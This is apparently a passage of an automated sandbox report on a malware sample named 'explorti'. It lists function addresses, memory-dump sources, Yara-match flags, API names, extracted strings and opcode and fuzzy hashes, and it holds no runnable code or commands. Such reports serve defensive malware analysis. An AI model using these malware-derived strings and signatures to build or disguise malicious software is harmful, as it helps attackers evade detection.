                        Function 04BE0D84 Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fb93ea86239db77849cf7dcf1c911a0bd3ec10c4a7143a89f180e5e956d16fb
                        • Instruction ID: 09e87a50f10b149e0943aa4065b345654385853caf608db9afab3d7f84e18445
                        • Opcode Fuzzy Hash: 0fb93ea86239db77849cf7dcf1c911a0bd3ec10c4a7143a89f180e5e956d16fb
                        • Instruction Fuzzy Hash: 3E014CE710C1306EA501A5435B406F7675DE2D5330370D866F843C2541F3D8B8867632
                        Function 04BE0D5F Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 507e6f993357370732669750148a0ab56fad4c7891c5d0bfd7628fe31cf1618d
                        • Instruction ID: 3b7022de0f49ee52b10b1273022096d7bdea49bc30fe2d0c1a51bc5698956a00
                        • Opcode Fuzzy Hash: 507e6f993357370732669750148a0ab56fad4c7891c5d0bfd7628fe31cf1618d
                        • Instruction Fuzzy Hash: 9001F7BB20C225AEA141E6936A049FB77AAE6C1330731C46BF842C6502E3D9A9497631
                        Function 04BE0E0E Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 108d4a3075863026e80f2f0d16da4f3c95b70d89efb326f712f54f4aebc5c360
                        • Instruction ID: d21c858d9f30c355f12680284d5b799005b1b17d009aa975865853f1eeb34511
                        • Opcode Fuzzy Hash: 108d4a3075863026e80f2f0d16da4f3c95b70d89efb326f712f54f4aebc5c360
                        • Instruction Fuzzy Hash: BCF0C8E710C1217EE11191666F15AF75B9ED3C6730B31C866F883C2587E3D9558A6232
                        Function 04BE0D8D Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e2ed1e10517ec02b9f6ef5274edf61256e8c7c7f58c8b4a90f96a92d81f0d50
                        • Instruction ID: e8ffb6fdc835056272e1e57ee7a3d86704a87ec0dd64cb4650b999a00b89a069
                        • Opcode Fuzzy Hash: 9e2ed1e10517ec02b9f6ef5274edf61256e8c7c7f58c8b4a90f96a92d81f0d50
                        • Instruction Fuzzy Hash: 1EF02DF720C2716EA10295926B109FB6BAEE5D7730331D8ABF842C2503F3D95D4A7531
                        Function 04BE0DB2 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17f51baf4fd0fef9938ced16110c55399399cf71dc6daa4837c68dbdbb22a761
                        • Instruction ID: b85e68d3198ef30d3be0e0d8d5b85190916d9618188e0042502391e620134af0
                        • Opcode Fuzzy Hash: 17f51baf4fd0fef9938ced16110c55399399cf71dc6daa4837c68dbdbb22a761
                        • Instruction Fuzzy Hash: F5F0E2E720C1317EB002A1936F11AFB579ED2C6730731CC66B883C3582E3C9298A7132

                        Non-executed Functions

                        Function 00F5E440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=
                        • API String ID: 0-3836280467
                        • Opcode ID: 10afbd7a74a26857f7d82d3e7227cb20a1fdf16c0d1ce5b62cba074091f29471
                        • Instruction ID: 36a7646f1f5227173ce38dd4c96d5a01fddeb6fd0351543ec23859a32933ce87
                        • Opcode Fuzzy Hash: 10afbd7a74a26857f7d82d3e7227cb20a1fdf16c0d1ce5b62cba074091f29471
                        • Instruction Fuzzy Hash: 1182F670914248DBEF14EF68CD497DD7FB6AB46308F608188E805673C2D7799A88DBD2
                        Function 00F93068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: c5f003ae5a1860482b5eab971d96e9d47f0826fae18d6c23428c0c9e04fd8b7c
                        • Instruction ID: e5b0e64e3bd033848390bf4dba649afad0862d36d2bc039e6c6668116c038349
                        • Opcode Fuzzy Hash: c5f003ae5a1860482b5eab971d96e9d47f0826fae18d6c23428c0c9e04fd8b7c
                        • Instruction Fuzzy Hash: 7BC23D72E046288FEF25CE28DD40BEAB3B5EB48315F1441EAD44DE7240E779AE859F41
                        Function 00F92BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: 5b2b519a5ff8447825bcab953fc47d119a4a85cc9bfb43dc44328d857a67ff58
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 2AF14171E012199FDF14CFA9C8806ADF7B1FF48324F15826AD519A7345D7319E41DB90
                        Function 00F6CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F6CE82,?,?,?,?,00F6CEB7,?,?,?,?,?,?,00F6C42D,?,00000001), ref: 00F6CB33
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: 7e8c4584d346c466a15e3af92d9978ba15b9564a2ea6a1e0ef2e0d9abbb68037
                        • Instruction ID: 55f94cf22acd30cea5882dc51620a8511805c4e40a8aea54e10558d965f81e99
                        • Opcode Fuzzy Hash: 7e8c4584d346c466a15e3af92d9978ba15b9564a2ea6a1e0ef2e0d9abbb68037
                        • Instruction Fuzzy Hash: C3D02232A0213CA3CA113BA4BC04ABCBB098B41B643000221E988231208A606C00BBD0
                        Function 00F87D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: 26fc057ea89351d12ee6e9edf4b8acdd109e8fecea73093da4c9b9938490ae3a
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: DD51CA72A0CB4857CB38FA3888D67FEBB9A9F51360F38049DE442CB682CA15DD45B351
                        Function 00F54CF0 Relevance: .7, Instructions: 701COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7d818c2093897374175b48bf8292bf81218b4d94fde30976cf5747b0a1305cc
                        • Instruction ID: 6048f1f31caa0b5f8005c60e04b7f1958a00fff4a638e742f0c9b224d4df54fc
                        • Opcode Fuzzy Hash: c7d818c2093897374175b48bf8292bf81218b4d94fde30976cf5747b0a1305cc
                        • Instruction Fuzzy Hash: C72260B3F515144BDB0CCB9DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9159A44
                        Function 00F96F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cb064c7d85ac70d2c22562bca80d69fd65f0ef42b181d29150225b1ad3a626c
                        • Instruction ID: b338e8cf47d3a77be2d19834b4396283306cf9408e50992084114260de695efe
                        • Opcode Fuzzy Hash: 9cb064c7d85ac70d2c22562bca80d69fd65f0ef42b181d29150225b1ad3a626c
                        • Instruction Fuzzy Hash: F5B15E32A24705DFEB19DF28C486B657BE0FF45364F258658E899CF2A1C336E981DB40
                        Function 00F6D312 Relevance: .2, Instructions: 172COMMON
                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 00F5247E
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID:
                        • API String ID: 2659868963-0
                        • Opcode ID: 7c5db725bb21bf6b34df665e3df01dd0ab11178c319258b39b0e96493e3790e4
                        • Instruction ID: 710e6a1a7cf63a017da4268f17e0f8cbfd08c61254c78c39f3bd35352cc743ef
                        • Opcode Fuzzy Hash: 7c5db725bb21bf6b34df665e3df01dd0ab11178c319258b39b0e96493e3790e4
                        • Instruction Fuzzy Hash: 0C519CB2E006098FDB15EF58D8C17AABBF4FB58320F24866AD404EB294D7799940EF50
                        Function 00F54AF0 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d2a49bdc71cbf212176daa0ab31cb0b3f22d6b32f8f1c4d125472623b226e06
                        • Instruction ID: c0942b5e2c5d5169a8ed5652752cf9a8897029d3520cc6dd4376bbe6084d6034
                        • Opcode Fuzzy Hash: 9d2a49bdc71cbf212176daa0ab31cb0b3f22d6b32f8f1c4d125472623b226e06
                        • Instruction Fuzzy Hash: 6351D37060C3928FC319CF2C841523ABFE1BFC6201F084A9EE5E687242D774E548DBA2
                        Function 00F9777B Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bc913bfd5e33d4d5774c5b74648c2c8e7b1ecc0b508d54772e825f8c8cdfb18
                        • Instruction ID: e760e53667457c61b147265a1529419233988c960940a6bf97ce0c785f60e1ae
                        • Opcode Fuzzy Hash: 9bc913bfd5e33d4d5774c5b74648c2c8e7b1ecc0b508d54772e825f8c8cdfb18
                        • Instruction Fuzzy Hash: 2721B673F205394B7B0CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D96CD917E2E4
                        Function 00F9765B Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d56335f7eb42eb5a54d04aaa630069ac9cb9bad97fb9c25be0b6d216c8c9a893
                        • Instruction ID: 779551e7dfd08d41524ab2afbd93d2071ba860c62720e201fbae0a15fb925874
                        • Opcode Fuzzy Hash: d56335f7eb42eb5a54d04aaa630069ac9cb9bad97fb9c25be0b6d216c8c9a893
                        • Instruction Fuzzy Hash: 8411CA23F30D255B775C817D8C1327AA1D2EBD824030F433AD826EB384E994DE23D290
                        Function 00F98720 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
